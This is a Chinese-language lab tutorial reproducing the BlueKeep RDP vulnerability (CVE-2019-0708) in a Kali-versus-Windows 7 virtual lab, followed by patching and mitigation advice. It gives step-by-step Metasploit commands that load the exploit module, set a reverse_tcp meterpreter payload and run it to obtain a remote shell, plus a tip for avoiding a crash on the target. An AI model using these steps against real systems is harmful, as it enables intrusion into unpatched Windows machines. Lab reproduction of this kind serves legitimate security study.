cve-2019-0708远程桌⾯代码执⾏漏洞复现
1.影响版本
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
2.漏洞描述
Microsoft Windows中存在远程桌⾯执⾏代码漏洞,该漏洞源于Microsoft Remote Desktop Services中存在输⼊验证错误漏洞,⽹络系统或产品未对输⼊的数据进⾏正确的验证。当未经⾝份验证的攻击者使⽤ RDP 连接到⽬标系统并发送经特殊设计的请求时,远程桌⾯服务(以前称为“终端服务”)中存在远程执⾏代码漏洞。此漏洞是预⾝份验证,⽆需⽤户交互。成功利⽤此漏洞的攻击者可以在⽬标系统上执⾏任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全⽤户权限的新帐户。
3.环境准备cve漏洞库
镜像:Windows 7 (下载不到的直接私信我,我给你发)
攻击机器:Kali 192.168.157.130
受害机器:win7 sp1:192.168.157.143
4.漏洞复现
1)在Vmware中安装镜像,受害主机开启远程桌⾯连接服务
2)配置msf,将exp放置到msf对应⽂件夹下,如果同名直接覆盖(以Kali为例)
rdp.rb ->/opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb ->/opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb ->/opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb ->/opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
3)加载攻击模块,配置参数
root@kali:~# msfconsole
msf5 > reload_all # 加载0708exp
msf5 >use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set rhost 192.168.157.143
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set lhost 192.168.157.130
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set lport 1919
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set payload windows/x64/meterpreter/reve
rse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> run
4)攻击成功,获取shell
使⽤show targets可查看相关选项,设置target我选2,虽然应该选择3,3是VMware,可是选择3会使得⽬标蓝屏,选2才能反弹shell
5.漏洞修复
1)及时去微软官⽹打对应系统的安全补丁;
2)关闭3389端⼝或添加防⽕墙安全策略限制对3389端⼝的访问;
3)打不了补丁的可以开启远程桌⾯(⽹络级别⾝份验证(NLA)),可以临时防⽌漏洞攻击。
免责声明:本⼈坚决反对利⽤教学⽅法进⾏犯罪的⾏为,⼀切犯罪⾏为必将受到严惩,绿⾊⽹络需要我们共同维护,更推荐⼤家了解它们背后的原理,更好地进⾏防护。禁⽌任何⼈转载到其他站点,禁⽌⽤于任何⾮法⽤途。如有任何⼈凭此做何⾮法事情,均于笔者⽆关,特此声明。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。